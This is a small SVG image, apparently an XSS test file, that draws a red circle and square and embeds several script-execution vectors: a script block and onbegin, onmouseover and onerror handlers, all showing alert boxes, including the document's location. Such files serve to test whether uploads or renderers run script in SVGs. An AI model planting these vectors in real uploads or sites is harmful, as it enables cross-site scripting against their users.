<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg" >
  <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
   <script type="text/javascript">
      alert('xss');
      alert(document.baseURI);
      alert(document.location);
   </script>
   <animate onbegin="alert(1)"/>
   <rect width='100' height="100" fill="red" onmouseover="alert(1)"/>
   <image href="x" onerror="alert(1)"/>
</svg>
